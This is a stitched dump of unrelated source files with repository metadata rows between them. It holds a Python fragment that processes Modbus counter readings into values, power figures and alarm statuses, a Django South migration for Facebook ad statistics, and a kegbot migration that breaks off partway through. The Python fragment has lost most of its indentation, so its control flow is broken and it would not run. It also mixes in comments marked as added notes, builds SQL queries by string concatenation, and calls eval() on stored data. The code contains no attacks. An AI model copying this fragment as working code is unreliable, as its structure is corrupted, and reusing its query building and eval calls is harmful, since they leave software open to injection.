self.read_counter_grp(bmba,bfirst,bcount,bwcount,bmbi) # reads and updates table
# raw sync done.
# now process raw -> value and find status BY SERVICES. service loop begins.
            #power calculations happen below too, for each service, not for each counter!
Cmd="select val_reg from "+self.in_sql+" group by val_reg" # process and report by services
#print "Cmd=",Cmd
cur.execute(Cmd) # getting services to be read and reported
            cpi=-1 # counter2power instance index; incremented only for members with cfg bit 64 set
for row in cur: # possibly multivalue service members
lisa='' # string to put space-separated values in
val_reg=''
sta_reg=''
status=0 #
value=0
val_reg=row[0] # service value register name
sta_reg=val_reg[:-1]+"S" # status register name
#print 'reading counter values for val_reg',val_reg,'with',mcount,'members' # temporary
Cmd3="select * from "+self.in_sql+" where val_reg='"+val_reg+"' order by member asc" # chk all members, also virtual!
#print Cmd3 # debug
cur3.execute(Cmd3)
for srow in cur3: # members for one counter svc
#print srow # debug
mba=0 # local here
regadd=0
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
                    ostatus=0 # previous status
#tvalue=0 # test
raw=0 # unconverted reading
#oraw=0 # previous unconverted reading
ovalue=0 # previous converted value
value=0 # latest (converted) value
ots=0
avg=0 # averaging strength, effective from 2
desc='' # description for UI
comment='' # comment internal
result=[]
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # counters
mba=int(srow[0]) if srow[0] != '' else 0 # modbus address
regadd=int(srow[1]) if srow[1] != '' else 0 # must be int! can be missing
val_reg=srow[2] # string
member=int(srow[3]) if srow[3] != '' else 0
cfg=int(srow[4]) if srow[4] != '' else 0 # config byte
x1=int(srow[5]) if srow[5] != '' else 0
x2=int(srow[6]) if srow[6] != '' else 0
y1=int(srow[7]) if srow[7] != '' else 0
y2=int(srow[8]) if srow[8] != '' else 0
outlo=int(srow[9]) if srow[9] != '' else 0
outhi=int(srow[10]) if srow[10] != '' else 0
avg=int(srow[11]) if srow[11] != '' else 0 # averaging strength, effective from 2
#if srow[12] != '': # block
# block=int(srow[12]) # block / error count
# updated before raw reading
raw=int(srow[13]) if srow[13] != '' else 0
# previous converted value
ovalue=eval(srow[14]) if srow[14] != '' else 0 # not updated above!
ostatus=int(srow[15]) if srow[15] != '' else 0
ots=eval(srow[16]) if srow[16] != '' else self.ts
#desc=srow[17]
#comment=srow[18]
#wcount=srow[19] # word count
#print('got from '+self.in_sql+' raw,ovalue',raw,ovalue) # debug
if lisa != '':
lisa=lisa+" "
# CONFIG BYTE BIT MEANINGS
# 1 - below outlo warning,
# 2 - below outlo critical,
# NB! 3 - not to be sent if value below outlo
# 4 - above outhi warning
# 8 - above outhi critical
                    # 16 - to be zeroed regularly (see next bits for when) - NOT IN USE, done by the server
                    # 32 - zero at midnight if 1, at month change if 0 - NOT IN USE
# 64 - power to be counted based on count increase and time period between counts
# 128 - OFF-state not used in lolimit, OFF is equal to in-range??
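                    # Worked example (added note): cfg == 6 sets bits 2|4, so the
                    # service goes critical below outlo and warning above outhi;
                    # cfg == 64 turns the count increase over time into a power value.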
if x1 != x2 and y1 != y2: # seems like normal input data
value=(raw-x1)*(y2-y1)/(x2-x1)
value=int(y1+value) # integer values to be reported only
else:
print("read_counters val_reg",val_reg,"member",member,"ai2scale PARAMETERS INVALID:",x1,x2,'->',y1,y2,'conversion not used!')
# jaab selline value nagu oli
if avg>1 and abs(value-ovalue)<value/2: # averaging the readings. big jumps (more than 50% change) are not averaged.
value=int(((avg-1)*ovalue+value)/avg) # averaging with the previous value, works like RC low pass filter
#print('counter avg on, value became ',value) # debug
# print('end processing counter',val_reg,'member',member,'raw',raw,' value',value,' ovalue',ovalue,', avg',avg) # debug
#POWER?
if (cfg&64): # power, increment to be calculated! divide increment to time from the last reading to get the power
cpi=cpi+1 # counter2power index
try:
if self.cp[cpi]:
pass # instance already exists
except:
self.cp.append(Counter2Power(val_reg,member,outlo,outhi)) # another Count2Power instance
print('Counter2Power() instance cp['+str(cpi)+'] created')
res=self.cp[cpi].calc(ots,value) # power calculation based on counter increase
value=res[0]
print('got result from cp['+str(cpi)+']: '+str(res)) # debug
else: # normal counter
if value == 0 and ovalue >0: # possible pic reset. perhaps value <= 100?
msg='restoring lost content for counter '+str(mba)+'.'+str(regadd)+':2 to become '+str(ovalue)+' again instead of '+str(value)
#syslog(msg)
print(msg)
value=ovalue # +value # restoring based on ovalue and new count
                            self.set_counter(value, mba=mba, regadd=regadd)
Cmd="update "+self.in_sql+" set value='"+str(value)+"' where val_reg='"+val_reg+"' and member='"+str(member)+"'"
conn.execute(Cmd) # new value set in sql table
# STATUS SET. check limits and set statuses based on that
# returning to normal with hysteresis, take previous value into account
status=0 # initially for each member
if value>outhi: # yle ylemise piiri
if (cfg&4) and status == 0: # warning if above the limit
status=1
if (cfg&8) and status<2: # critical if above the limit
status=2
if (cfg&12) == 12: # unknown if above the limit
status=3
else: # return to normal with hysteresis
if value<outhi-0.05*(outhi-outlo):
status=0 # normal again
if value<outlo: # below lo limit
if (cfg&1) and status == 0: # warning if below lo limit
status=1
if (cfg&2) and status<2: # warning if below lo limit
status=2
if (cfg&3) == 3: # unknown if below lo limit
status=3
else: # return
if value>outlo+0.05*(outhi-outlo):
status=0 # normal again
#print('status for counter svc',val_reg,status,'due to cfg',cfg,'and value',value,'while limits are',outlo,outhi) # debug
#if value<ovalue and ovalue < 4294967040: # this will restore the count increase during comm break
lisa=lisa+str(value) # members together into one string
# sending service to buffer
if self.ts - self.ts_send>self.sendperiod:
sent=1
sendtuple=[sta_reg,status,val_reg,lisa]
#print('counter svc - going to report',sendtuple) # debug
udp.send(sendtuple) # to uniscada instance
if sent == 1:
self.ts_send = self.ts
sent = 0
conn.commit() # counters transaction end
return 0
except: # end reading counters
msg='problem with counters read or processing: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(1)
return 1
#read_counters end #############
    def doall(self): # do this regularly, executes only if the time is right
''' Reads and possibly reports counters on time if executed regularly '''
self.ts = round(time.time(),1)
if self.ts - self.ts_read>self.readperiod:
self.ts_read = self.ts
self.read_counters() # also includes ts_sent test and reporting
return 0
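# --- Illustrative usage (an added sketch, not part of the original module) ---
# Typical polling loop: doall() re-reads the counters every readperiod seconds
# and reports every sendperiod seconds; the periods below are assumptions and
# `time` is pulled in via sqlgeneral's wildcard import.
if __name__ == '__main__':
    cch = Cchannels('counters.sql', readperiod=10, sendperiod=30)
    while True:
        cch.doall()
        time.sleep(1)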
|
gpl-3.0
| -895,499,548,288,928,400 | 47.240741 | 182 | 0.517658 | false |
ramusus/django-facebook-ads
|
facebook_ads/migrations/0014_auto__add_field_adstatistic_reach__add_field_adstatistic_frequency__ad.py
|
1
|
14442
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'AdStatistic.reach'
db.add_column('facebook_ads_adstatistic', 'reach', self.gf('django.db.models.fields.IntegerField')(null=True), keep_default=False)
# Adding field 'AdStatistic.frequency'
db.add_column('facebook_ads_adstatistic', 'frequency', self.gf('django.db.models.fields.FloatField')(null=True), keep_default=False)
# Adding field 'AdStatistic.unique_ctr'
db.add_column('facebook_ads_adstatistic', 'unique_ctr', self.gf('django.db.models.fields.FloatField')(default=0), keep_default=False)
# Changing field 'AdStatistic.social_reach'
db.alter_column('facebook_ads_adstatistic', 'social_reach', self.gf('django.db.models.fields.IntegerField')(null=True))
def backwards(self, orm):
# Deleting field 'AdStatistic.reach'
db.delete_column('facebook_ads_adstatistic', 'reach')
# Deleting field 'AdStatistic.frequency'
db.delete_column('facebook_ads_adstatistic', 'frequency')
# Deleting field 'AdStatistic.unique_ctr'
db.delete_column('facebook_ads_adstatistic', 'unique_ctr')
# Changing field 'AdStatistic.social_reach'
db.alter_column('facebook_ads_adstatistic', 'social_reach', self.gf('django.db.models.fields.IntegerField')(default=0))
models = {
'facebook_ads.adaccount': {
'Meta': {'ordering': "['account_id']", 'object_name': 'AdAccount'},
'account_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'account_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'business_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_country_code': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_street2': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'business_zip': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'currency': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'daily_spend_limit': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_personal': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'timezone_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'timezone_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'vat_status': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'facebook_ads.adcampaign': {
'Meta': {'ordering': "['name']", 'object_name': 'AdCampaign'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adcampaigns'", 'to': "orm['facebook_ads.AdAccount']"}),
'campaign_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'campaign_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'daily_budget': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'daily_imps': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lifetime_budget': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'updated_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'facebook_ads.adcreative': {
'Meta': {'ordering': "['creative_id']", 'object_name': 'AdCreative'},
'auto_update': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'body': ('django.db.models.fields.CharField', [], {'max_length': '135'}),
'count_current_adgroups': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'creative_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'image_url': ('django.db.models.fields.URLField', [], {'max_length': '100'}),
'link_url': ('django.db.models.fields.URLField', [], {'max_length': '1024'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'object_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'preview_url': ('django.db.models.fields.URLField', [], {'max_length': '100'}),
'related_fan_page': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'run_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'story_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
'type': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'view_tag': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'facebook_ads.adgroup': {
'Meta': {'ordering': "['name']", 'object_name': 'AdGroup'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdAccount']"}),
'ad_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'ad_status': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'adgroup_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'adgroup_status': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'bid_type': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'campaign': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdCampaign']"}),
'creative': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'null': 'True', 'to': "orm['facebook_ads.AdCreative']"}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_bid': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'targeting': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'adgroup'", 'unique': 'True', 'null': 'True', 'to': "orm['facebook_ads.Targeting']"}),
'updated_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'facebook_ads.adimage': {
'Meta': {'object_name': 'AdImage'},
'hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': "'32'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': "'100'"})
},
'facebook_ads.adstatistic': {
'Meta': {'ordering': "['statistic_id']", 'object_name': 'AdStatistic'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdAccount']"}),
'actions': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'adgroup': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdGroup']"}),
'campaign': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdCampaign']"}),
'clicks': ('django.db.models.fields.IntegerField', [], {}),
'connections': ('django.db.models.fields.IntegerField', [], {}),
'cpc': ('django.db.models.fields.FloatField', [], {}),
'cpm': ('django.db.models.fields.FloatField', [], {}),
'ctr': ('django.db.models.fields.FloatField', [], {}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'frequency': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impressions': ('django.db.models.fields.IntegerField', [], {}),
'reach': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'social': ('django.db.models.fields.FloatField', [], {}),
'social_clicks': ('django.db.models.fields.IntegerField', [], {}),
'social_ctr': ('django.db.models.fields.FloatField', [], {}),
'social_impressions': ('django.db.models.fields.IntegerField', [], {}),
'social_reach': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'social_spent': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'social_unique_clicks': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'social_unique_impressions': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'spent': ('django.db.models.fields.FloatField', [], {}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'statistic_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': "'100'"}),
'unique_clicks': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'unique_ctr': ('django.db.models.fields.FloatField', [], {}),
'unique_impressions': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'facebook_ads.aduser': {
'Meta': {'ordering': "['role']", 'unique_together': "(('account', 'uid'),)", 'object_name': 'AdUser'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'users'", 'to': "orm['facebook_ads.AdAccount']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'permissions': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '20'}),
'role': ('django.db.models.fields.IntegerField', [], {}),
'uid': ('django.db.models.fields.BigIntegerField', [], {})
},
'facebook_ads.targeting': {
'Meta': {'object_name': 'Targeting'},
'age_max': ('facebook_ads.fields.PositiveSmallIntegerRangeField', [], {'null': 'True', 'blank': 'True'}),
'age_min': ('facebook_ads.fields.PositiveSmallIntegerRangeField', [], {'null': 'True', 'blank': 'True'}),
'broad_age': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'cities': ('annoying.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'college_majors': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100'}),
'college_networks': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'college_years': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
'connections': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
'countries': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100', 'blank': 'True'}),
'education_statuses': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100'}),
'excluded_connections': ('annoying.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'friends_of_connections': ('annoying.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'genders': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '5', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interested_in': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'keywords': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '4000'}),
'locales': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'radius': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'regions': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'relationship_statuses': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'user_adclusters': ('annoying.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'user_event': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
'work_networks': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'zips': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['facebook_ads']
|
bsd-3-clause
| 7,205,643,682,640,550,000 | 76.645161 | 183 | 0.567304 | false |
Alwnikrotikz/kegbot
|
pykeg/src/pykeg/core/migrations/0046_session_stats.py
|
1
|
26297
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'SessionStats'
db.create_table('core_sessionstats', (
('stats', self.gf('pykeg.core.jsonfield.JSONField')(default='{}')),
('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['core.KegbotSite'])),
('session', self.gf('django.db.models.fields.related.ForeignKey')(related_name='stats', unique=True, to=orm['core.DrinkingSession'])),
('date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('revision', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
))
db.send_create_signal('core', ['SessionStats'])
def backwards(self, orm):
# Deleting model 'SessionStats'
db.delete_table('core_sessionstats')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'beerdb.beerimage': {
'Meta': {'object_name': 'BeerImage'},
'added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edited': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'primary_key': 'True'}),
'num_views': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'original_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'revision': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'beerdb.beerstyle': {
'Meta': {'object_name': 'BeerStyle'},
'added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edited': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'revision': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'beerdb.beertype': {
'Meta': {'object_name': 'BeerType'},
'abv': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'brewer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['beerdb.Brewer']"}),
'calories_oz': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'carbs_oz': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'edited': ('django.db.models.fields.DateTimeField', [], {}),
'edition': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'beers'", 'null': 'True', 'to': "orm['beerdb.BeerImage']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'original_gravity': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'revision': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'specific_gravity': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'style': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['beerdb.BeerStyle']"})
},
'beerdb.brewer': {
'Meta': {'object_name': 'Brewer'},
'added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'country': ('pykeg.core.fields.CountryField', [], {'default': "'USA'", 'max_length': '3'}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'edited': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'brewers'", 'null': 'True', 'to': "orm['beerdb.BeerImage']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'origin_city': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'origin_state': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'production': ('django.db.models.fields.CharField', [], {'default': "'commercial'", 'max_length': '128'}),
'revision': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.authenticationtoken': {
'Meta': {'unique_together': "(('site', 'seqn', 'auth_device', 'token_value'),)", 'object_name': 'AuthenticationToken'},
'auth_device': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pin': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tokens'", 'to': "orm['core.KegbotSite']"}),
'token_value': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'core.bac': {
'Meta': {'object_name': 'BAC'},
'bac': ('django.db.models.fields.FloatField', [], {}),
'drink': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Drink']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'rectime': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'core.config': {
'Meta': {'object_name': 'Config'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'configs'", 'to': "orm['core.KegbotSite']"}),
'value': ('django.db.models.fields.TextField', [], {})
},
'core.drink': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'Drink'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keg': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'drinks'", 'null': 'True', 'to': "orm['core.Keg']"}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'drinks'", 'null': 'True', 'to': "orm['core.DrinkingSession']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'drinks'", 'to': "orm['core.KegbotSite']"}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'default': "'valid'", 'max_length': '128'}),
'ticks': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'drinks'", 'null': 'True', 'to': "orm['auth.User']"}),
'volume_ml': ('django.db.models.fields.FloatField', [], {})
},
'core.drinkingsession': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'DrinkingSession'},
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessions'", 'to': "orm['core.KegbotSite']"}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'blank': 'True', 'null': 'True', 'populate_from': 'None', 'db_index': 'True'}),
'starttime': ('django.db.models.fields.DateTimeField', [], {}),
'volume_ml': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'core.keg': {
'Meta': {'unique_together': "(('site', 'seqn'),)", 'object_name': 'Keg'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'enddate': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'origcost': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'seqn': ('django.db.models.fields.PositiveIntegerField', [], {}),
